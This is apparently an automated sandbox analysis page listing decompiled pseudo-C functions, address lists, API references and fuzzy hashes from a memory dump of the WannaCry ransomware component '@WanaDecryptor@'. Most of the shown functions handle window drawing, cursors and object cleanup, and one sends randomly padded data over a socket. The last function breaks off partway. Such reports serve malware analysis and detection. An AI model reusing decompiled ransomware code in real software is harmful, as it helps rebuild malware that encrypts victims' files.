                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}







                                  0x00406a01
                                  0x00406a0c
                                  0x00406a10
                                  0x00406a11
                                  0x00406a12
                                  0x00406a14
                                  0x00406a15
                                  0x00406a1d
                                  0x00406ab7
                                  0x00406ab7
                                  0x00406a23
                                  0x00406a23
                                  0x00000000
                                  0x00406a32
                                  0x00406a35
                                  0x00406a3a
                                  0x00406a44
                                  0x00406a70
                                  0x00406a72
                                  0x00406a79
                                  0x00406a46
                                  0x00406a48
                                  0x00406a52
                                  0x00000000
                                  0x00406a54
                                  0x00406a56
                                  0x00406a60
                                  0x00000000
                                  0x00406a62
                                  0x00406a64
                                  0x00406a6b
                                  0x00406a6b
                                  0x00406a60
                                  0x00406a52
                                  0x00406a7c
                                  0x00406a84
                                  0x00000000
                                  0x00000000
                                  0x00406a8c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406a97
                                  0x00406a98
                                  0x00406a9a
                                  0x00406aa5
                                  0x00406ab0
                                  0x00000000
                                  0x00406ab0
                                  0x00406aad
                                  0x00000000
                                  0x00000000
                                  0x00406a23
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3089$#4476
                                  • String ID:
                                  • API String ID: 2870283385-0
                                  • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                  • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}













                                  0x0040d0a9
                                  0x0040d0ab
                                  0x0040d0ad
                                  0x0040d0b3
                                  0x0040d0b8
                                  0x0040d0bb
                                  0x0040d0c0
                                  0x0040d0c6
                                  0x0040d0cc
                                  0x0040d0d1
                                  0x0040d0e1
                                  0x0040d0ef
                                  0x0040d0f3
                                  0x0040d0f7
                                  0x0040d0fb
                                  0x0040d100
                                  0x0040d101
                                  0x0040d105
                                  0x0040d110
                                  0x0040d124
                                  0x0040d129
                                  0x0040d13d
                                  0x0040d14d
                                  0x0040d12d
                                  0x0040d137
                                  0x0040d137
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d0d3
                                  0x0040d0d3
                                  0x0040d0d8
                                  0x0040d0dc
                                  0x0040d0dd
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                  • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}






                                  0x00405181
                                  0x00405186
                                  0x0040518a
                                  0x00405191
                                  0x0040519c
                                  0x004051fb
                                  0x0040519e
                                  0x0040519e
                                  0x004051a1
                                  0x004051a9
                                  0x004051af
                                  0x004051b5
                                  0x004051b5
                                  0x004051bf
                                  0x004051c5
                                  0x004051c5
                                  0x004051cf
                                  0x00000000
                                  0x004051f2
                                  0x004051e7
                                  0x004051e7

                                  APIs
                                  • _mbscmp.MSVCRT ref: 00405191
                                  • #860.MFC42(?), ref: 004051A1
                                  • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                  • String ID:
                                  • API String ID: 497622568-0
                                  • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                  • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00412A00(intOrPtr* _a4) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14);
						L00412C98();
						return  *0x4220dc;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}








                                  0x00412a01
                                  0x00412a07
                                  0x00412a18
                                  0x00412a27
                                  0x00412a27
                                  0x00412a33
                                  0x00412a38
                                  0x00412a3a
                                  0x00412a42
                                  0x00412a44
                                  0x00412a45
                                  0x00412a4a
                                  0x00412a4a
                                  0x00412a4d
                                  0x00412a53
                                  0x00412a5f
                                  0x00412a61
                                  0x00412a62
                                  0x00412a67
                                  0x00412a67
                                  0x00412a6a
                                  0x00412a6b
                                  0x00412a75
                                  0x00412a7a
                                  0x00412a7a
                                  0x00412a7d
                                  0x00412a7e
                                  0x00412a8d
                                  0x00412a1a
                                  0x00412a20
                                  0x00412a25
                                  0x00412a25
                                  0x00412a09
                                  0x00412a0f
                                  0x00412a14
                                  0x00412a14

                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                  • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                  • Opcode Fuzzy Hash: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                  • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketsendsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 4063721217-0
                                  • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                  • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}










                                  0x00404434
                                  0x00404436
                                  0x0040443b
                                  0x00404480
                                  0x00404484
                                  0x00404484
                                  0x00404497
                                  0x0040449e
                                  0x00404499
                                  0x00404499
                                  0x00404499
                                  0x004044a2
                                  0x004044aa
                                  0x004044b3
                                  0x0040443d
                                  0x0040443f
                                  0x00404447
                                  0x0040444f
                                  0x00404452
                                  0x00404449
                                  0x00404449
                                  0x00404449
                                  0x0040445a
                                  0x00404463
                                  0x0040446b
                                  0x0040446f
                                  0x00404478
                                  0x00404478

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$CursorEventMouseTrack
                                  • String ID:
                                  • API String ID: 2186836335-0
                                  • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                  • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}











                                  0x00404cf0
                                  0x00404cf2
                                  0x00404cf7
                                  0x00404cfd
                                  0x00404cfe
                                  0x00404d0c
                                  0x00404d10
                                  0x00404d18
                                  0x00404d1b
                                  0x00404d1f
                                  0x00404d27
                                  0x00404d2c
                                  0x00404d31
                                  0x00404d37
                                  0x00404d3a
                                  0x00404d3e
                                  0x00404d46
                                  0x00404d4b
                                  0x00404d53
                                  0x00404d59
                                  0x00404d5e
                                  0x00404d65
                                  0x00404d6d
                                  0x00404d78
                                  0x00404d82

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                  • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                  • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#641#800
                                  • String ID:
                                  • API String ID: 2580907805-0
                                  • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                  • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}










                                  0x00404170
                                  0x00404172
                                  0x00404177
                                  0x0040417d
                                  0x0040417e
                                  0x0040418c
                                  0x00404190
                                  0x00404196
                                  0x0040419e
                                  0x004041a1
                                  0x004041a5
                                  0x004041ad
                                  0x004041b2
                                  0x004041ba
                                  0x004041c0
                                  0x004041c5
                                  0x004041cd
                                  0x004041d2
                                  0x004041d9
                                  0x004041e1
                                  0x004041ec
                                  0x004041f6

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                  • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#2414#795
                                  • String ID:
                                  • API String ID: 932896513-0
                                  • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                  • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}










                                  0x00402e00
                                  0x00402e06
                                  0x00402e0e
                                  0x00402e7a
                                  0x00402e7a
                                  0x00402e7e
                                  0x00402e82
                                  0x00402e10
                                  0x00402e14
                                  0x00402e14
                                  0x00402e16
                                  0x00402e1d
                                  0x00402e24
                                  0x00402e27
                                  0x00402e2c
                                  0x00402e2e
                                  0x00402e33
                                  0x00402e43
                                  0x00402e44
                                  0x00402e49
                                  0x00402e39
                                  0x00402e3b
                                  0x00402e3b
                                  0x00402e33
                                  0x00402e4c
                                  0x00402e4d
                                  0x00402e50
                                  0x00402e53
                                  0x00402e56
                                  0x00402e62
                                  0x00402e68
                                  0x00402e68
                                  0x00402e6d
                                  0x00402e73
                                  0x00402e77
                                  0x00402e77

                                  APIs
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825
                                  • String ID: j'@
                                  • API String ID: 41483190-370697233
                                  • Opcode ID: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                  • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                  • Opcode Fuzzy Hash: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                  • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
